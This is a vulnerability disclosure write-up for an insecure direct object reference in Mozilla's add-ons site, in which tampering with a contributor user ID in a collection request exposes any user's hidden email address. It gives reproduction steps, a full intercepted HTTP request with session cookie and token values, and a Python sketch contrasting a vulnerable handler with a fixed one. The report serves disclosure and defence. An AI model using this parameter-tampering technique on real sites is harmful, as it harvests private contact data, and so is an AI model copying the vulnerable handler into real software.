Email address disclosure of all Mozilla Add-ons accounts (Indirect Object Reference)

Hi All,

Bug Title: Email address disclosure of all Mozilla Add-ons accounts (Indirect Object Reference)

Bug type: Indirect object reference (IDOR)

Category: Broken authentication and privilege escalation

OWASP Link: https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

Organization: Mozilla

Web Application Link: https://addons.mozilla.org/en-US/firefox/

Steps to reproduce:

1. Go to the link: https://addons.mozilla.org/en-US/firefox/users/edit
2. Here you get an option to hide your email address from other users.
Once you hide your email address, no other user can see or get the email address associated with your account.
But there is a way to get the email address of any user.

Steps to reproduce:
1. Create a collection and go to the collection settings.
2. Now go to Contributor and add any valid email ID of any user.
3. Now save it and intercept this request.
HTTP request:
POST /en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/contributors HTTP/1.0
Host: addons.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://addons.mozilla.org/en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/
Cookie: optimizelySegments=%7B%22245875585%22%3A%22referral%22%2C%22245617832%22%3A%22none%22%2C%22246048108%22%3A%22false%22%2C%22245677587%22%3A%22ff%22%2C%22869421433%22%3A%22true%22%2C%222000810488%22%3A%22false%22%2C%222017550344%22%3A%22ff%22%2C%221994990450%22%3A%22none%22%2C%222011280991%22%3A%22referral%22%2C%22246002457%22%3A%22referral%22%2C%22246073290%22%3A%22ff%22%2C%22245984388%22%3A%22false%22%2C%22246073289%22%3A%22none%22%7D; optimizelyEndUserId=oeu1439904202539r0.7982840573823196; optimizelyBuckets=%7B%7D; _ga=GA1.2.337997935.1439904205; __utma=164683759.337997935.1439904205.1441817471.1443040970.25; __utmz=164683759.1441743614.22.7.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); mamo=off; __utmb=164683759.14.10.1443040970; anoncsrf=Kzb5CeM039Nta0JFtMQP1lw1MNNjcu7v; __utmc=164683759; sessionid=".eJyrVkouLkqLL8nPTs1TslLKsSiuDMxMzskuLkyvKvWvsPDPD880D7LI8cgIDggysFDSUYpPLC3JiC8tTi2Kz0xRsjI0NDUwszA0QZFISkwGmgeUVQJxi_Wg_GI9x9z8UKCIE1S-FgAPyixu:1Zeqtr:ys0215LtWnbgxtF4mlF_lQ085YA"; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

csrfmiddlewaretoken=l8syQiclksqgzuOx8OoWi7R8lHhSPR08&contributor=11552132

Here the POST parameter contributor is the user ID that belongs to the email address you entered. Change this user ID to any other user's ID and that user's email address is saved in your collection. So you can get any user's email address even when the user has hidden it from other users.
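To make the server-side failure concrete, here is an added example in plain Python (not Mozilla's code; accounts, IDs and addresses are constructed): a contributor handler that trusts the client-supplied user ID and echoes the full record back, beside a hardened one that resolves the typed address server-side and only ever renders a contributor through that user's own privacy setting.

```python
from dataclasses import dataclass, field

@dataclass
class User:
    id: int
    display_name: str
    email: str
    email_hidden: bool  # the "hide my email address from other users" setting

@dataclass
class Collection:
    owner_id: int
    contributor_ids: set = field(default_factory=set)

# Constructed sample accounts for this example only.
USERS = {
    1: User(1, "owner", "owner@example.test", email_hidden=False),
    11552132: User(11552132, "hidden_user", "hidden@example.test", email_hidden=True),
}

def public_view(user: User, viewer_id: int) -> dict:
    """Return only the fields `user` has chosen to expose to `viewer_id`."""
    shown = {"id": user.id, "display_name": user.display_name}
    if viewer_id == user.id or not user.email_hidden:
        shown["email"] = user.email
    return shown

def add_contributor_vulnerable(coll: Collection, viewer_id: int, contributor_id: int) -> dict:
    # Models the reported bug: the handler takes whatever ID the client posts,
    # stores it, and returns the account's email regardless of email_hidden.
    user = USERS[contributor_id]
    coll.contributor_ids.add(user.id)
    return {"id": user.id, "email": user.email}

def add_contributor_fixed(coll: Collection, viewer_id: int, contributor_email: str) -> dict:
    # Accepts what the owner actually typed (an address), resolves it on the
    # server, checks ownership, and never returns more than public_view allows.
    if viewer_id != coll.owner_id:
        raise PermissionError("only the collection owner may add contributors")
    user = next((u for u in USERS.values()
                 if u.email.lower() == contributor_email.strip().lower()), None)
    if user is None:
        raise LookupError("no account with that email address")
    coll.contributor_ids.add(user.id)
    return public_view(user, viewer_id)

def render_contributors(coll: Collection, viewer_id: int) -> list:
    # Display path for the settings page: every listed contributor goes through
    # the same privacy filter, so a stored ID never turns into a leaked address.
    return [public_view(USERS[uid], viewer_id) for uid in sorted(coll.contributor_ids)]
```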


Actual results:

So basically this bypasses the privacy of the user's email. It is a combination of an IDOR and an information disclosure bug.

Impact:
1. Anyone can get the email of any user and contact him.
2. Anyone can add any user to a collection and to other places where you can only add users through their email ID.
There could be more critical attacks which I may not be aware of.



Additional Video POC link : https://www.dropbox.com/s/3a6vicbgb4i8sfj/email_mozilla_IDOR.mov?dl=0

Bugzilla Report Link : https://bugzilla.mozilla.org/show_bug.cgi?id=1207807

Thanks for Reading :)
